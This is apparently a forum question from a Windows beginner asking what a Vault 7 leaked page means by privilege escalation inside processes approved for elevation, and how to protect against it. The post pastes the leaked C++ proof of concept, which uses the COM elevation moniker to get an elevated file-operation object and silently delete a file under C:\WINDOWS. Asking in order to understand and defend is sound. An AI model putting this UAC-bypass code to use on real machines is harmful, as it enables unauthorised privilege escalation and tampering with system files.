The vault 7 leaks say you can escalate privilege using code "within the context of a process approved for elevation", with explorer.exe and notepad as examples.
Windows noob here. What does that mean, and how do I protect against it? Are they giving corrupted binaries or are they getting notepad to execute their code? Link and code used below:
https://wikileaks.org/ciav7p1/cms/page_3375231.html
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, void **ppv)
{
BIND_OPTS3 bo;
WCHAR wszCLSID[50];
WCHAR wszMon[300];
StringFromGUID2(rclsid, wszCLSID, sizeof(wszCLSID)/sizeof(wszCLSID[0]));
HRESULT hr = StringCchPrintfW(wszMon, sizeof(wszMon)/sizeof(wszMon[0]), L"Elevation:Administrator!new:%s", wszCLSID);
if (FAILED(hr))
return hr;
memset(&bo, 0, sizeof(bo));
bo.cbStruct = sizeof(bo);
bo.hwnd = hwnd;
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
return CoGetObject(wszMon, &bo, riid, ppv);
}
void ElevatedDelete()
{
MessageBox(NULL, "DELETING", "TESTING", MB_OK);
// This is only availabe on Vista and higher
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE);
IFileOperation *pfo;
hr = CoCreateInstanceAsAdmin(NULL, CLSID_FileOperation, IID_PPV_ARGS(&pfo));
pfo->SetOperationFlags(FOF_NO_UI);
IShellItem *item = NULL;
hr = SHCreateItemFromParsingName(L"C:\\WINDOWS\\TEST.DLL", NULL, IID_PPV_ARGS(&item));
pfo->DeleteItem(item, NULL);
pfo->PerformOperations();
item->Release();
pfo->Release();
CoUninitialize();
}